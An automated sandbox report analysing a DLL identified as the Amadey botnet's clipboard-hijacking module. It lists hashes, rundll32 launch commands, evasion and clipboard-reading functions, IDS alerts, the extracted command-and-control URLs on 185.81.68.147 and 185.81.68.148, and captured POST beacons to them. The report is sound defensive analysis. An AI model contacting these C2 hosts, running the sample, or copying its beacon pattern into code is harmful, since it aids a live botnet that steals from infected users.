Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
D72j5I83wU.dll

Overview

General Information

Sample name:D72j5I83wU.dll
renamed because original name is a hash value
Original sample name:c2f3fbbbe6d5f48a71b6b168b1485866.dll
Analysis ID:1574266
MD5:c2f3fbbbe6d5f48a71b6b168b1485866
SHA1:1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256:c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
Tags:Amadeydlluser-abuse_ch
Infos:

Detection

Amadey
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
C2 URLs / IPs found in malware configuration
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7864 cmdline: loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7916 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7940 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7924 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8060 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8076 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8180 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8188 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6872 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10"}
SourceRuleDescriptionAuthorStrings
D72j5I83wU.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    SourceRuleDescriptionAuthorStrings
    11.2.rundll32.exe.6ec40000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      7.2.rundll32.exe.6ec40000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-13T07:56:37.610787+010028561511A Network Trojan was detected192.168.2.1049726185.81.68.14880TCP
        2024-12-13T07:56:40.220798+010028561511A Network Trojan was detected192.168.2.1049733185.81.68.14880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://185.81.68.148/2Avira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpmAvira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpmUtcsAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/RAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpRAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpHAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpFAvira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpJAvira URL Cloud: Label: phishing
        Source: http://185.81.68.147/Avira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php.Avira URL Cloud: Label: phishing
        Source: D72j5I83wU.dllMalware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10"}
        Source: D72j5I83wU.dllVirustotal: Detection: 65%Perma Link
        Source: D72j5I83wU.dllReversingLabs: Detection: 47%
        Source: D72j5I83wU.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: D72j5I83wU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC4BCEE FindFirstFileExW,7_2_6EC4BCEE

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.10:49733 -> 185.81.68.148:80
        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.10:49726 -> 185.81.68.148:80
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80Jump to behavior
        Source: Malware configuration extractorIPs: 185.81.68.148
        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
        Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
        Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC41EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_6EC41EC0
        Source: unknownHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/
        Source: rundll32.exe, 00000007.00000002.3176039165.000000000340A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
        Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpm
        Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpmUtcs
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/2
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3176039165.000000000343F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
        Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php.
        Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpF
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpH
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpJ
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpR
        Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/R
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC431B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6EC431B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC431B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6EC431B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC431B07_2_6EC431B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC51AB17_2_6EC51AB1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EC473B0 appears 34 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EC45D90 appears 103 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EC46B05 appears 47 times
        Source: D72j5I83wU.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: classification engineClassification label: mal92.troj.spyw.evad.winDLL@18/0@0/2
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
        Source: D72j5I83wU.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: D72j5I83wU.dllVirustotal: Detection: 65%
        Source: D72j5I83wU.dllReversingLabs: Detection: 47%
        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,MainJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",MainJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: D72j5I83wU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 8080Thread sleep count: 167 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 8080Thread sleep time: -167000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7192Thread sleep count: 163 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7192Thread sleep time: -163000s >= -30000sJump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC4BCEE FindFirstFileExW,7_2_6EC4BCEE
        Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
        Source: rundll32.exe, 00000007.00000002.3176039165.0000000003441000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
        Source: rundll32.exe, 00000007.00000002.3176039165.000000000347D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: rundll32.exe, 00000007.00000002.3176039165.000000000347D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW07
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC47288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6EC47288
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC4A254 mov eax, dword ptr fs:[00000030h]7_2_6EC4A254
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC4B881 mov eax, dword ptr fs:[00000030h]7_2_6EC4B881
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC4D218 GetProcessHeap,7_2_6EC4D218
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC47288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6EC47288
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC46B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6EC46B1A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC49820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6EC49820

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC470A7 cpuid 7_2_6EC470A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EC473F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_6EC473F8

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: D72j5I83wU.dll, type: SAMPLE
        Source: Yara matchFile source: 11.2.rundll32.exe.6ec40000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.rundll32.exe.6ec40000.0.unpack, type: UNPACKEDPE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        111
        Process Injection
        11
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        111
        Process Injection
        LSASS Memory21
        Security Software Discovery
        Remote Desktop Protocol2
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information
        NTDS1
        File and Directory Discovery
        Distributed Component Object ModelInput Capture11
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Rundll32
        LSA Secrets12
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
